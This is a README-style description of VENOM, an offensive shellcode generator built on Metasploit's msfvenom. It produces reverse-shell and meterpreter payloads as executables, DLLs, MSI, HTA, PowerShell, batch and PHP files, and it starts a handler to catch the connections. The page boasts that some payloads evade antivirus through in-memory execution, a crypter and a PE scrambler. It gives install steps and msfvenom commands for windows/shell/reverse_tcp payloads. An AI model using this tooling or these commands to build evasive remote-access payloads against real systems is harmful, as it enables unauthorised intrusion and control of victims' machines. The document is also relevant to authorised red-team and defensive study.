
VENOM 1.0.12 Codename: Black Mamba – Metasploit shellcode generator/compiler.
[ DISCLAIMER ]
The author does not hold any responsibility for the bad use of this tool, remember that attacking targets without prior consent is illegal and punished by law.
The script uses msfvenom (Metasploit) to generate shellcode in different formats ( c | python | ruby | dll | msi | hta-psh ), injects the generated shellcode into one function (example: python), “the python function will execute the shellcode in RAM”, and uses compilers like gcc (gnu cross compiler), mingw32 or pyinstaller to build the executable file. It also starts a multi-handler to receive the remote connection (reverse shell or meterpreter session).
—
The ‘shellcode generator’ tool reproduces some of the techniques used by Veil-Evasion framework, unicorn.py, powersploit, etc. “P.S. some payloads are undetectable by AV solutions, yes!!!” One of the reasons for that is the use of a function to execute the 2nd stage of shell/meterpreter directly in the target's RAM.
DEPENDENCIES :
— “crisp.sh will download/install all dependencies as they are needed”
— Zenity | Metasploit | GCC (compiler) | Pyinstaller (python-to-exe module)
— python-pip (pyinstaller downloader) | mingw32 (compile .EXE executables)
— pyherion.py (crypter) | PEScrambler.exe (PE obfuscator/scrambler.)
Features
option – build – target – format – output
—
1 – shellcode – unix – C – C
2 – shellcode – windows – C – DLL
3 – shellcode – windows – DLL – DLL
4 – shellcode – windows – C – PYTHON/EXE
5 – shellcode – windows – C – EXE
6 – shellcode – windows – MSIEXEC – MSI
7 – shellcode – windows – C – RUBY
8 – shellcode – windows – HTA-PSH – HTA
9 – shellcode – windows – PSH-CMD – PS1
10 – shellcode – windows – PSH-CMD – BAT
11 – shellcode – webserver – PHP – PHP
12 – shellcode – multi OS – PYTHON(b64) – PYTHON
—
F – FAQ (frequently asked questions)
E – exit shellcode generator
Usage:
    git clone https://github.com/r00t-3xp10it/venom && cd venom
    cd aux
    ./setup.sh
    cd ..
    ./venom.sh

Updates:
    git pull origin master

[ HOW DOES MSFVENOM ACTUALLY BUILD SHELLCODE? ]
The default way to generate a Windows binary payload (.exe) using msfvenom is through the -f flag (output format):

    msfvenom -p payload-name LHOST=127.0.0.1 LPORT=666 -f exe -o payload.exe

But msfvenom allows us to build shellcode in different formats like:
asp, aspx, aspx-exe, dll, elf, exe, exe-small, hta-psh,
macho, osx-app, psh, vba, vba-exe, vba-psh, vbs, bash, c,
java, perl, powershell, python, ruby, sh, vbscript.

The complete list can be accessed using the following command:

    sudo msfvenom --help-formats

Now let's generate a simple shellcode for windows/shell/reverse_tcp, choosing powershell as the output format. "Note that we will not use the -o flag (save the payload), so the generated shellcode will only be displayed in the current terminal window."

Using powershell as output format:

    msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f powershell

Using java as output format:

    msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f java

Using hex as output format:

    msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f hex
Source : https://github.com/r00t-3xp10it